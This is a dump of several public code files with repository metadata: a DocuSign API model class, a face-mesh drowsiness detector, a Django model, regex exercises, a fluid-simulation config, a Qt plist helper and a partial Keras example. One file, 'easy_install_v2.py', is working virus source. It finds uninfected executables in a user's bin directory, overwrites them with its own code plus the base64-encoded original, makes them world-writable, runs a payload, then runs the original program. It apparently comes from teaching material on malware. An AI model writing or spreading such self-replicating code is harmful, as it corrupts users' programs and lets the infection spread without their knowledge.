blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
281
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
57
| license_type
stringclasses 2
values | repo_name
stringlengths 6
116
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 313
values | visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 18.2k
668M
⌀ | star_events_count
int64 0
102k
| fork_events_count
int64 0
38.2k
| gha_license_id
stringclasses 17
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 107
values | src_encoding
stringclasses 20
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 4
6.02M
| extension
stringclasses 78
values | content
stringlengths 2
6.02M
| authors
listlengths 1
1
| author
stringlengths 0
175
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
b0b09977413df66d842b53b5df6ee0e5dec3c57e
|
34096e5f3d6569e3aaee794bf8ccc0b04f2c8c8f
|
/docusign_esign/models/offline_attributes.py
|
077596d786a847ed9812880ca9dd352e3e55323a
|
[
"MIT"
] |
permissive
|
hunk/docusign-python-client
|
5c96de8a08973fe1744d902b2a3873a7376a62c7
|
a643c42c1236715e74eef6fc279a1b29da1b5455
|
refs/heads/master
| 2021-06-14T06:41:23.298368
| 2020-04-01T05:51:08
| 2020-04-01T05:51:08
| 254,482,059
| 0
| 0
|
MIT
| 2020-04-09T21:28:23
| 2020-04-09T21:28:23
| null |
UTF-8
|
Python
| false
| false
| 7,470
|
py
|
# coding: utf-8
"""
DocuSign REST API
The DocuSign REST API provides you with a powerful, convenient, and simple Web services API for interacting with DocuSign.
OpenAPI spec version: v2.1
Contact: devcenter@docusign.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class OfflineAttributes(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self, account_esign_id=None, device_model=None, device_name=None, gps_latitude=None, gps_longitude=None, offline_signing_hash=None):
"""
OfflineAttributes - a model defined in Swagger
:param dict swaggerTypes: The key is attribute name
and the value is attribute type.
:param dict attributeMap: The key is attribute name
and the value is json key in definition.
"""
self.swagger_types = {
'account_esign_id': 'str',
'device_model': 'str',
'device_name': 'str',
'gps_latitude': 'str',
'gps_longitude': 'str',
'offline_signing_hash': 'str'
}
self.attribute_map = {
'account_esign_id': 'accountEsignId',
'device_model': 'deviceModel',
'device_name': 'deviceName',
'gps_latitude': 'gpsLatitude',
'gps_longitude': 'gpsLongitude',
'offline_signing_hash': 'offlineSigningHash'
}
self._account_esign_id = account_esign_id
self._device_model = device_model
self._device_name = device_name
self._gps_latitude = gps_latitude
self._gps_longitude = gps_longitude
self._offline_signing_hash = offline_signing_hash
@property
def account_esign_id(self):
"""
Gets the account_esign_id of this OfflineAttributes.
A GUID identifying the account associated with the consumer disclosure
:return: The account_esign_id of this OfflineAttributes.
:rtype: str
"""
return self._account_esign_id
@account_esign_id.setter
def account_esign_id(self, account_esign_id):
"""
Sets the account_esign_id of this OfflineAttributes.
A GUID identifying the account associated with the consumer disclosure
:param account_esign_id: The account_esign_id of this OfflineAttributes.
:type: str
"""
self._account_esign_id = account_esign_id
@property
def device_model(self):
"""
Gets the device_model of this OfflineAttributes.
A string containing information about the model of the device used for offline signing.
:return: The device_model of this OfflineAttributes.
:rtype: str
"""
return self._device_model
@device_model.setter
def device_model(self, device_model):
"""
Sets the device_model of this OfflineAttributes.
A string containing information about the model of the device used for offline signing.
:param device_model: The device_model of this OfflineAttributes.
:type: str
"""
self._device_model = device_model
@property
def device_name(self):
"""
Gets the device_name of this OfflineAttributes.
A string containing information about the type of device used for offline signing.
:return: The device_name of this OfflineAttributes.
:rtype: str
"""
return self._device_name
@device_name.setter
def device_name(self, device_name):
"""
Sets the device_name of this OfflineAttributes.
A string containing information about the type of device used for offline signing.
:param device_name: The device_name of this OfflineAttributes.
:type: str
"""
self._device_name = device_name
@property
def gps_latitude(self):
"""
Gets the gps_latitude of this OfflineAttributes.
A string containing the latitude of the device location at the time of signing.
:return: The gps_latitude of this OfflineAttributes.
:rtype: str
"""
return self._gps_latitude
@gps_latitude.setter
def gps_latitude(self, gps_latitude):
"""
Sets the gps_latitude of this OfflineAttributes.
A string containing the latitude of the device location at the time of signing.
:param gps_latitude: The gps_latitude of this OfflineAttributes.
:type: str
"""
self._gps_latitude = gps_latitude
@property
def gps_longitude(self):
"""
Gets the gps_longitude of this OfflineAttributes.
A string containing the longitude of the device location at the time of signing.
:return: The gps_longitude of this OfflineAttributes.
:rtype: str
"""
return self._gps_longitude
@gps_longitude.setter
def gps_longitude(self, gps_longitude):
"""
Sets the gps_longitude of this OfflineAttributes.
A string containing the longitude of the device location at the time of signing.
:param gps_longitude: The gps_longitude of this OfflineAttributes.
:type: str
"""
self._gps_longitude = gps_longitude
@property
def offline_signing_hash(self):
"""
Gets the offline_signing_hash of this OfflineAttributes.
:return: The offline_signing_hash of this OfflineAttributes.
:rtype: str
"""
return self._offline_signing_hash
@offline_signing_hash.setter
def offline_signing_hash(self, offline_signing_hash):
"""
Sets the offline_signing_hash of this OfflineAttributes.
:param offline_signing_hash: The offline_signing_hash of this OfflineAttributes.
:type: str
"""
self._offline_signing_hash = offline_signing_hash
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
|
[
"noreply@github.com"
] |
noreply@github.com
|
ab0b8196c759f436a72d4ad731e16756cc9d4511
|
699cf40f6326b954a40b78e87317a62401bd4c2c
|
/.history/Drowsy_Detection_20210728124624.py
|
935884724404299f8e03c238ed4ff5289a4858c5
|
[] |
no_license
|
KhanhNguyen1308/Python-mediapippe
|
e3927f9c0c6499d8a3ba50a675617b89197dce89
|
981412efd39bd29c34a66afbec88abdabcb47ab9
|
refs/heads/main
| 2023-06-25T18:37:43.234063
| 2021-07-29T11:35:31
| 2021-07-29T11:35:31
| 368,535,068
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,727
|
py
|
import cv2
import time
import numpy as np
import mediapipe as mp
import tensorflow as tf
from threading import Thread
from head_pose_ratio import head_pose_ratio
from function import draw_point, eye_avg_ratio, put_text
from Angle_head_pose_ratio import head_pose_status, eye_stat
from mode import sleep_mode
interpreter = tf.lite.Interpreter('model.tflite')
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
output_details = interpreter.get_output_details()
cap = cv2.VideoCapture('Video/test_1406.mp4')
# cap = cv2.VideoCapture(0)
pTime = 0
time_active = 0
m = 0
status = ''
mpDraw = mp.solutions.drawing_utils
mpFaceMesh = mp.solutions.face_mesh
faceMesh = mpFaceMesh.FaceMesh()
drawSpec = mpDraw.DrawingSpec(thickness=1, circle_radius=2)
eye_status = ''
x_status = ''
y_status = ''
z_status = ''
head_status = ''
Drowsy_mode = ''
draw = False
t = 0
ear = 0
start_time = time.time()
count = 0
blink = 0
blink_perM = 0
pre_blink = 0
while True:
ret, img = cap.read()
ih, iw = img.shape[0], img.shape[1]
imgRGB = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
results = faceMesh.process(imgRGB)
if results:
face = []
Mount = []
Left_eye = []
Right_eye = []
try:
for face_lms in results.multi_face_landmarks:
for lm in face_lms.landmark:
x, y = int(lm.x * iw), int(lm.y * ih)
face.append([x, y])
nose = face[5]
Left_eye.append([face[249], face[374], face[380], face[382], face[385], face[386]])
Right_eye.append([face[7], face[145], face[153], face[155], face[158], face[159]])
Mount.append([face[308], face[317], face[14], face[87], face[61], face[82], face[13], face[312]])
img = draw_point(img, nose, Left_eye, Right_eye, Mount)
ear = eye_avg_ratio(Left_eye, Right_eye)
x1, x2, x3, x4, x5, x6 = head_pose_ratio(nose, Left_eye, Right_eye)
input_shape = input_details[0]['shape']
input_data = np.array((x1, x2, x3, x4, x5, x6), dtype=np.float32)
interpreter.set_tensor(input_details[0]['index'], input_data)
interpreter.invoke()
img = cv2.putText(img, str(x5), (nose[0] - 20, nose[1]), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 255), 1)
img = cv2.putText(img, str(x6), (nose[0] + 20, nose[1]), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 255), 1)
head_status, mode = head_pose_status(x5, x6, x2)
eye_status, blink, count = eye_stat(ear, count, blink, mode)
if mode == 1:
print(round(ear, 3))
Drowsy_mode = sleep_mode(mode, ear, blink)
m += 1
except:
eye_status = 'None Face'
x_status = 'None Face'
y_status = 'None Face'
cTime = time.time()
fps = int(1 / (cTime - pTime))
pTime = cTime
img = cv2.putText(img, str(m), (10, 10), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 0, 0), 1)
text_fps = 'FPS:' + str(fps)
text_EaR = 'Eye_avg_Ratio: ' + str(round(ear, 2))
text_Head_pose = 'Head_pose: ' + head_status
text_ES = 'Eye_Status: ' + eye_status
text_blink = 'Blink_Num: ' + str(blink)
text_blink_avg = 'Blink_AVG: ' + str(blink_perM)
img = put_text(img, text_fps, text_EaR, text_ES, text_blink, text_blink_avg, text_Head_pose)
cv2.imshow('results', img)
if (time.time() - start_time) > 60:
start_time = time.time()
time_active += 1
blink_perM = blink
pre_blink = blink
blink = 0
key = cv2.waitKey(1)
# if m == 900:
# break
if key == ord('q'):
break
cap.release()
cv2.destroyAllWindows()
|
[
"khanhnguyenduy1308@gmail.com"
] |
khanhnguyenduy1308@gmail.com
|
b39d2e8a3337080a1c893fd9b36e4a0743b7a421
|
cf431dd9967ba3de7732541e42412fa9bd2bf4ba
|
/todo/models.py
|
555d0d4228bdccf2f6ba5aa1e9bbc0c89d8b036b
|
[] |
no_license
|
ansu5555/TaskManager
|
de073c53b50fa876118b03f564cea5a51fbc947c
|
a6a743a2fbe9203afc0694f89bbe938ace6f843a
|
refs/heads/master
| 2021-09-06T22:35:08.632556
| 2018-02-12T17:46:27
| 2018-02-12T17:46:27
| 12,598,650
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 294
|
py
|
from django.db import models
# Create your models here.
class todo_lists(models.Model):
todo_crtdt = models.DateTimeField(auto_now_add=True)
todo_detail = models.CharField(max_length=100)
todo_duedt = models.DateTimeField()
todo_complete = models.BooleanField(default=False)
|
[
"ansuman5555@gmail.com"
] |
ansuman5555@gmail.com
|
586389d67bfb22c131f65413987a6d9937d948a4
|
085773c6b2945589e60022ba8268d2e93a61145f
|
/cha_10_regular_expression/10_7_match.py
|
1eac13208caf382181b89f4b5903da67f81f838d
|
[] |
no_license
|
bj1570saber/muke_Python_July
|
dde67a74882f0bcc72c1aca828922829376a0375
|
96fa464bd0eeb8a922e713700addb548b6ef4727
|
refs/heads/master
| 2020-09-08T14:08:36.963017
| 2020-01-09T08:54:41
| 2020-01-09T08:54:41
| 221,154,988
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 801
|
py
|
import re
a = 'pyth_pytho0python1pythonn2pythonnnn'
# *: match previous char 'n' 0 or many times
r = re.findall('python*', a)
print(r)# ['pytho', 'python', 'pythonn', 'pythonnnn']
print('~' * 20)
# +: match previous char 'n' 1 or many times
r = re.findall('python+', a)
print(r)# ['python', 'pythonn', 'pythonnnn']
print('~' * 20)
# ?: match previous char 'n' 1 or 0 time
r = re.findall('python?', a)
print(r)#['pytho', 'python', 'python', 'python']
print('~' * 20)
# number: match previous char 'n' 1-3 times OK
r = re.findall('python{1,3}', a) # accept 1-3 times 'n'.
print(r)#['python', 'pythonn', 'pythonnn']
print('~' * 20)
### ?: force None Greedy
# ? match previous char 'n' 1 time only
r = re.findall('python{1,3}?', a) # as less 'n' as possible.
print(r)#['python', 'python', 'python']
|
[
"bj1570saber@gmail.com"
] |
bj1570saber@gmail.com
|
904a7bc9b799b09ef6eb6b12445e53839cc08f7b
|
a02a2da4ca761b74544ab0fe819847074930fed8
|
/demos/incompressible_flow/scalar_transport/almgren-two-grids-check-div-eps-1/config.py
|
0da2495e847aad20e2ced600036b7ce982cbbbb6
|
[] |
no_license
|
marc-nguessan/mrpy
|
40ac7a11404ed97ab5824f4dc8fd57e8d51caf95
|
6fb0bce485234a45bb863f71bc2bdf0a22014de3
|
refs/heads/master
| 2020-12-03T08:28:11.312333
| 2020-01-01T19:05:05
| 2020-01-01T19:05:05
| 231,252,927
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 12,650
|
py
|
"""...
"""
from math import *
# Definition of time integration
t_ini = 0.
t_end = 0.5
nt = 200
dt = (t_end - t_ini) / nt
dt_sc = dt / 20
# Definition of the printing options
n_print = min(nt, 600)
#n_print = nt
dt_print = (t_end - t_ini) / n_print
# domain size
L = 1
x_1 = 0.
y_1 = 0.
x_2 = 0.09
y_2 = 0.
x_3 = -0.045
y_3 = 0.045*sqrt(3)
x_4 = -0.045
y_4 = -0.045*sqrt(3)
x_5 = -0.09
y_5 = 0.
F_1 = -150
F_2 = 50
F_3 = 50
F_4 = 50
F_5 = -100
F_6 = 50
# Definition of the domain dimensions
xmin = -L/2.
xmax = L/2.
ymin = -L/2.
ymax = L/2.
zmin = -L/2.
zmax = L/2.
# Definition of the flow characteristics
Re = 100.
nu = 5.e-4 # (m*m)/s
kappa = 5.e-3 # (m*m)/s
# Tree dimmension
dimension = 2
# Trees min_level
min_level = 2
min_level_sc = 2
# Trees max_level
max_level = 7
max_level_sc = 7
# Tree stencil graduation
stencil_graduation = 1
# Tree stencil prediction
stencil_prediction = 1
# Frequency of the multiresolution transform
mr_freq = 10
# function
# def function(x, y, t=0.):
# from math import sin, cos, exp, pi
# return sin(pi*(x+t))*sin(pi*(y+t))
#def function(x):
#
# from math import tanh
#
# return tanh(50.*abs(x-1./2.))
#def function(x, y):
#
# from math import exp, sqrt
#
# return exp(-30.*sqrt((x+0.5)**2 + (y-0.5)**2)) + exp(-30.*sqrt((x-0.5)**2 + (y+0.5)**2))
# Definition of the boundary conditions dictionary bc_dict
# # bc_dict gives the value of the north, south, west and
# # east values of every variables involved in the flow
# # computation
def u_north(coords, t=0.):
#return (Re*nu) / (xmax - xmin)
#return 1.
return 0.
def u_south(coords, t=0.):
#return 1.
return 0.
def u_west(coords, t=0.):
#return 1.
return 0.
def u_east(coords, t=0.):
#return 1.
return 0.
def u_back(coords, t=0.):
#return 1.
return 0.
def u_forth(coords, t=0.):
#return 1.
return 0.
def v_north(coords, t=0.):
#return 1.
return 0.
def v_south(coords, t=0.):
#return 1.
return 0.
def v_west(coords, t=0.):
#return 1.
return 0.
def v_east(coords, t=0.):
#return 1.
return 0.
def v_back(coords, t=0.):
#return 1.
return 0.
def v_forth(coords, t=0.):
#return 1.
return 0.
def p_north(coords, t=0.):
#return 1.
return 0.
def p_south(coords, t=0.):
#return 1.
return 0.
def p_west(coords, t=0.):
#return 1.
return 0.
def p_east(coords, t=0.):
#return 1.
return 0.
def p_back(coords, t=0.):
#return 1.
return 0.
def p_forth(coords, t=0.):
#return 1.
return 0.
def s_north(coords, t=0.):
#return 1.
return 0.
def s_south(coords, t=0.):
#return 1.
return 0.
def s_west(coords, t=0.):
#return 1.
return 0.
def s_east(coords, t=0.):
#return 1.
return 0.
def s_back(coords, t=0.):
#return 1.
return 0.
def s_forth(coords, t=0.):
#return 1.
return 0.
def phi_north(coords, t=0.):
#return 1.
return 0.
def phi_south(coords, t=0.):
#return 1.
return 0.
def phi_west(coords, t=0.):
#return 1.
return 0.
def phi_east(coords, t=0.):
#return 1.
return 0.
def phi_back(coords, t=0.):
#return 1.
return 0.
def phi_forth(coords, t=0.):
#return 1.
return 0.
bc_dict = {"u": {"north": ("neumann", u_north),
#"north": ("dirichlet", u_north),
#"north": ("periodic", u_north),
"south": ("neumann", u_south),
#"south": ("dirichlet", u_south),
#"south": ("periodic", u_south),
"east": ("dirichlet", u_east),
#"east": ("periodic", u_east),
#"east": ("neumann", u_east),
"west": ("dirichlet", u_west),
#"west": ("periodic", u_west),
#"west": ("neumann", u_west),
#"back": ("dirichlet", u_back),
"back": ("periodic", u_back),
#"back": ("neumann", u_back),
#"forth": ("dirichlet", u_forth)},
"forth": ("periodic", u_forth)},
#"forth": ("neumann", u_forth)},
"v": {#"north": ("neumann", v_north),
"north": ("dirichlet", v_north),
#"north": ("periodic", v_north),
#"south": ("neumann", v_south),
"south": ("dirichlet", v_south),
#"south": ("periodic", v_south),
#"east": ("dirichlet", v_east),
#"east": ("periodic", v_east),
"east": ("neumann", v_east),
#"west": ("dirichlet", v_west),
#"west": ("periodic", v_west),
"west": ("neumann", v_west),
#"back": ("dirichlet", v_back),
"back": ("periodic", v_back),
#"back": ("neumann", v_back),
#"forth": ("dirichlet", v_forth),
"forth": ("periodic", v_forth)},
#"forth": ("neumann", v_forth)},
"phi": {#"north": ("neumann", phi_north),
"north": ("dirichlet", phi_north),
#"north": ("periodic", phi_north),
#"south": ("neumann", phi_south),
"south": ("dirichlet", phi_south),
#"south": ("periodic", phi_south),
"east": ("dirichlet", phi_east),
#"east": ("periodic", phi_east),
#"east": ("neumann", phi_east),
"west": ("dirichlet", phi_west),
#"west": ("periodic", phi_west),
#"west": ("neumann", phi_west),
#"back": ("dirichlet", phi_back),
"back": ("periodic", phi_back),
#"back": ("neumann", phi_back),
#"forth": ("dirichlet", phi_forth),
"forth": ("periodic", phi_forth)},
#"forth": ("neumann", phi_forth)},
"s": {"north": ("neumann", s_north),
#"north": ("dirichlet", s_north),
#"north": ("periodic", s_north),
"south": ("neumann", s_south),
#"south": ("dirichlet", s_south),
#"south": ("periodic", s_south),
#"east": ("dirichlet", s_east),
#"east": ("periodic", s_east),
"east": ("neumann", s_east),
#"west": ("dirichlet", s_west),
#"west": ("periodic", s_west),
"west": ("neumann", s_west),
#"back": ("dirichlet", s_back),
"back": ("periodic", s_back),
#"back": ("neumann", s_back),
#"forth": ("dirichlet", s_forth),
"forth": ("periodic", s_forth)},
#"forth": ("neumann", s_forth)},
"p": {"north": ("neumann", p_north),
#"north": ("dirichlet", p_north),
#"north": ("periodic", p_north),
"south": ("neumann", p_south),
#"south": ("dirichlet", p_south),
#"south": ("periodic", p_south),
#"east": ("dirichlet", p_east),
#"east": ("periodic", p_east),
"east": ("neumann", p_east),
#"west": ("dirichlet", p_west),
#"west": ("periodic", p_west),
"west": ("neumann", p_west),
#"back": ("dirichlet", p_back),
#"back": ("periodic", p_back),
"back": ("neumann", p_back),
#"forth": ("dirichlet", p_forth),
#"forth": ("periodic", p_forth)}}
"forth": ("neumann", p_forth)}}
# Name of the prediction operator module used for a given simulation
prediction_operator_module = "mrpy.mr_utils.operators.prediction." + "centered_polynomial_interpolation"
# Threshold parameter
threshold_parameter = 1.e-3
# Threshold speed propagation
threshold_speed_propagation = 1
# Name of the thresholding operator
#thresholding_operator_module = "thresholding_operators." + "harten_thresholding"
thresholding_operator_module = "mrpy.mr_utils.operators.thresholding." + "predictive_thresholding"
# Name of the scheme class used for the time integration
#class_scheme_name = "mrpy.discretization." + "temporal_impl_expl_euler"
class_scheme_name = "mrpy.discretization." + "temporal_radau2A"
# Name of the scheme used for the time integration of the scalar
scalar_scheme = "mrpy.discretization." + "RK4_scalar"
# # Names of the six main spatial operators used for the computation of the
# # simulation: divergence_x, divregence_y, gradient_x, gradient_y, laplacian_x,
# # laplacian_y; the name are divided in two parts:
# # the name of the package where the spatial operators modules are stored and the
# # name of the specific python output module
#gradient_module_name = "mrpy.spatial_operators." + "ctr_poly.2nd_order_ctr_finite_diff.gradient"
gradient_module_name = "mrpy.spatial_operators." + "haar.2nd_order_ctr_finite_diff.gradient"
#divergence_module_name = "mrpy.spatial_operators." + "ctr_poly.2nd_order_ctr_finite_diff.divergence"
divergence_module_name = "spatial_operators." + "haar.2nd_order_ctr_finite_diff.divergence"
#laplacian_module_name = "mrpy.spatial_operators." + "ctr_poly.2nd_order_ctr_finite_diff.laplacian"
#laplacian_module_name = "mrpy.spatial_operators." + "ctr_poly.2nd_order_ctr_finite_diff.laplacian-bis"
laplacian_module_name = "mrpy.spatial_operators." + "haar.2nd_order_ctr_finite_diff.laplacian"
#laplacian_module_name = "mrpy.spatial_operators." + "haar.2nd_order_ctr_finite_diff.laplacian-bis"
#mass_module_name = "mrpy.spatial_operators." + "ctr_poly.2nd_order_ctr_finite_diff.mass"
mass_module_name = "spatial_operators." + "haar.2nd_order_ctr_finite_diff.mass"
#inverse_mass_module_name = "mrpy.spatial_operators." + "ctr_poly.2nd_order_ctr_finite_diff.inverse_mass"
inverse_mass_module_name = "spatial_operators." + "haar.2nd_order_ctr_finite_diff.inverse_mass"
# Name of the output file used to print the solution; it is divided in two parts:
# the name of the package where the input/output modules are stored and the
# name of the specific python output module
#output_module_name = "mrpy.io." + "output-1D-gnuplot"
#output_module_name = "mrpy.io." + "output-tikz"
#output_module_name = "mrpy.io." + "output-2D-gnuplot"
output_module_name = "mrpy.io." + "output-xdmf"
# !!!!!! partie ci-dessous a modifier !!!!!!!!
# Definition of a function that gives the exact value of the x-component of the
# velocity over the domain
# Amplitude of the signal
amp = 1.e+0
def u_exact(x, y, t=0.):
# return pi*cos(pi*x)*sin(pi*y)*exp(-2*pi*pi*nu*t)
#return amp*sin(pi*(x+t))*sin(pi*(y+t))
# return exp(-50*(x**2 + y**2))
return 0.
# Definition of a function that gives the exact value of the y-component of the
# velocity over the domain
def v_exact(x, y, t=0.):
# return -pi*sin(pi*x)*cos(pi*y)*exp(-2*pi*pi*nu*t)
#return amp*cos(pi*(x+t))*cos(pi*(y+t))
# return -exp(-50*(x**2 + y**2))
return 0.
# Definition of a function that gives the exact value of the pressure over the
# domain
def p_exact(x, y, t=0.):
# return (pi*pi)/2.*(sin(pi*x)*sin(pi*x) + sin(pi*y)*sin(pi*y))*exp(-4*pi*pi*nu*t)
#return amp*sin(pi*(x-y+t))
return 1.
def sc_init(x, y, t=0.):
return tanh(100*y)
#if y < 0:
# return 0.
#else:
# return 1.
def omega(x, y, t=0.):
#return 100*(exp(-(1/r_0**2)*((x - x_1)**2 + y**2)) + exp(-(1/r_0**2)*((x - x_2)**2 + y**2)))
#return 0.5*F_1*(1 + tanh(100*(0.03 - sqrt((x - x_1)**2 + (y - y_1)**2)))) + \
# 0.5*F_2*(1 + tanh(100*(0.03 - sqrt((x - x_2)**2 + (y - y_2)**2)))) + \
# 0.5*F_3*(1 + tanh(100*(0.03 - sqrt((x - x_3)**2 + (y - y_3)**2)))) + \
# 0.5*F_4*(1 + tanh(100*(0.03 - sqrt((x - x_4)**2 + (y - y_4)**2))))
return 0.5*F_5*(1 + tanh(100*(0.03 - sqrt((x - x_1)**2 + (y - y_1)**2)))) + \
0.5*F_6*(1 + tanh(100*(0.03 - sqrt((x - x_2)**2 + (y - y_2)**2)))) + \
0.5*F_6*(1 + tanh(100*(0.03 - sqrt((x - x_5)**2 + (y - y_5)**2))))
#return 0.
def source_term_function_velocity_x(x, y, t=0.):
#return pi*(2*amp*nu*pi*sin(pi*(x+t))*sin(pi*(y+t)) + \
# amp*cos(pi*(x-y+t)) + amp*sin(pi*(x+y+2*t)) + \
# amp*amp*sin(pi*(x+t))*cos(pi*(x+t)))
return 0.
def source_term_function_velocity_y(x, y, t=0.):
#return pi*(2*amp*nu*pi*cos(pi*(x+t))*cos(pi*(y+t)) - \
# amp*cos(pi*(x-y+t)) - amp*sin(pi*(x+y+2*t)) - \
# amp*amp*sin(pi*(y+t))*cos(pi*(y+t)))
return 0.
|
[
"arthur.nguessan@gmail.com"
] |
arthur.nguessan@gmail.com
|
7faacb9fdcd5f1ce0dc6e1a0c84d359a98b04453
|
3f2d56b2191e0aa0b9bae2f6023deee9f2f444be
|
/Libs_et_Modules/easy_install_v2.py
|
732f9124122e336aff75fb51dd532bace00f6510
|
[] |
no_license
|
goffinet/GLMF201
|
8c5a11c7d4a631a95098ae00bc9509929df0a7ca
|
0213ca0fe8cb7bdbee54a128788a7d079394afcb
|
refs/heads/master
| 2021-01-21T11:22:50.099598
| 2017-01-18T14:00:14
| 2017-01-18T14:00:14
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,566
|
py
|
#!/usr/bin/python3
# === INFECTED ===
import os
from sys import argv
import stat
import random
import base64
import tempfile
cmd_init, cmd = ('ls', 'ls')
pathToCorrupt = '/home/tristan/my_bin/'
fileToCorrupt = pathToCorrupt + cmd
def isInfected(content):
return content == b'# === INFECTED ===\n'
def bomb():
print('BEAAAAAAAAAAH!')
with open(fileToCorrupt, 'rb') as currentFile:
ftcLines = currentFile.readlines()
if isInfected(ftcLines[1]):
filenames = os.listdir(pathToCorrupt)
random.shuffle(filenames)
for cmd in filenames:
if cmd != cmd_init:
with open(pathToCorrupt + cmd, 'rb') as newFile:
ftcLines = newFile.readlines()
if not isInfected(ftcLines[1]):
fileToCorrupt = pathToCorrupt + cmd
break
else:
print('All files already corrupted!')
exit(0)
# ftcLines contient le code binaire du programme
ftcLines = b''.join(ftcLines)
# On détermine où se trouve le code exécutable original
with open(argv[0], 'rb') as currentFile:
content = currentFile.readlines()
startOrigin = False
original = None
virus = []
for i in range(len(content)):
if startOrigin:
original = content[i][2:]
else:
virus.append(content[i])
if content[i] == b'# === ORIGINAL ===\n':
startOrigin = True
# virus contient le virus
# original contient le code binaire original
# On efface l'exécutable, on écrit le code Python et on colle le code binaire
print('Infection in progress : command', cmd)
os.remove(fileToCorrupt)
with open(fileToCorrupt, 'wb') as currentFile:
for line in virus:
currentFile.write(line)
currentFile.write(b'# ' + base64.b64encode(ftcLines))
os.chmod(fileToCorrupt, stat.S_IXUSR | stat.S_IRUSR | stat.S_IWUSR | stat.S_IXGRP | stat.S_IROTH | stat.S_IWOTH | stat.S_IXOTH | stat.S_IROTH | stat.S_IWOTH)
# Bombe logique
bomb()
# Exécution du code original
try:
if argv[0] != './easy_install_v2.py':
if original is None:
original = ftcLines
temp = tempfile.NamedTemporaryFile(delete=True)
with open(temp.name, 'wb') as tmpCmdFile:
tmpCmdFile.write(base64.b64decode(original))
os.chmod(temp.name, stat.S_IXUSR | stat.S_IRUSR | stat.S_IWUSR | stat.S_IXGRP | stat.S_IROTH | stat.S_IWOTH | stat.S_IXOTH | stat.S_IROTH | stat.S_IWOTH)
temp.file.close()
os.system(temp.name +' ' + ' '.join(argv[1:]))
except:
exit(2)
# === ORIGINAL ===
|
[
"tristan.colombo@gmail.com"
] |
tristan.colombo@gmail.com
|
51e97447fab2edd2d535b5f7d4cd8faff5ee62e1
|
cf833f507001409066a1aa1716161c6fcaea846b
|
/share/qt/clean_mac_info_plist.py
|
ee26b3c1fa50df733839f9002a0fcae496c788f2
|
[
"MIT"
] |
permissive
|
Dubaicash/Dubaicash
|
b963eaa3865eb9e25fac50a5c874944a71845d59
|
5dc7df7271db82691441169b47f2409e209696da
|
refs/heads/master
| 2021-01-25T11:16:00.580273
| 2018-10-29T19:51:15
| 2018-10-29T19:51:15
| 123,389,485
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 899
|
py
|
#!/usr/bin/env python
# Jonas Schnelli, 2013
# make sure the Dubaicash-Qt.app contains the right plist (including the right version)
# fix made because of serval bugs in Qt mac deployment (https://bugreports.qt-project.org/browse/QTBUG-21267)
from string import Template
from datetime import date
bitcoinDir = "./";
inFile = bitcoinDir+"/share/qt/Info.plist"
outFile = "Dubaicash-Qt.app/Contents/Info.plist"
version = "unknown";
fileForGrabbingVersion = bitcoinDir+"bitcoin-qt.pro"
for line in open(fileForGrabbingVersion):
lineArr = line.replace(" ", "").split("=");
if lineArr[0].startswith("VERSION"):
version = lineArr[1].replace("\n", "");
fIn = open(inFile, "r")
fileContent = fIn.read()
s = Template(fileContent)
newFileContent = s.substitute(VERSION=version,YEAR=date.today().year)
fOut = open(outFile, "w");
fOut.write(newFileContent);
print "Info.plist fresh created"
|
[
"dubaicashdev@gmail.com"
] |
dubaicashdev@gmail.com
|
12686b41f48293ecb798c9a1ddd3b0cd93d17050
|
f8adcf8dd868fda7ba7098eb94e383c7d588bffb
|
/test/readme_example_generate.py
|
b3435a74ea47747f4da915274d866f3ee169057f
|
[
"MIT"
] |
permissive
|
bobyguo/frugally-deep
|
a847ad4fcb31d8d891ae6456d307a0e1e26e062f
|
20e2507e6055d1e64f4cf5a0a9a5a71bf3b3e97e
|
refs/heads/master
| 2020-03-08T08:26:21.410373
| 2018-04-09T09:24:02
| 2018-04-09T09:24:02
| 128,021,948
| 0
| 0
|
MIT
| 2018-04-04T07:08:09
| 2018-04-04T07:08:09
| null |
UTF-8
|
Python
| false
| false
| 542
|
py
|
#!/usr/bin/env python3
import numpy as np
from tensorflow.python.keras.layers import Input, Dense
from tensorflow.python.keras.models import Model
inputs = Input(shape=(4,))
x = Dense(5, activation='relu')(inputs)
predictions = Dense(3, activation='softmax')(x)
model = Model(inputs=inputs, outputs=predictions)
model.compile(loss='categorical_crossentropy', optimizer='nadam')
model.fit(
np.asarray([[1,2,3,4], [2,3,4,5]]),
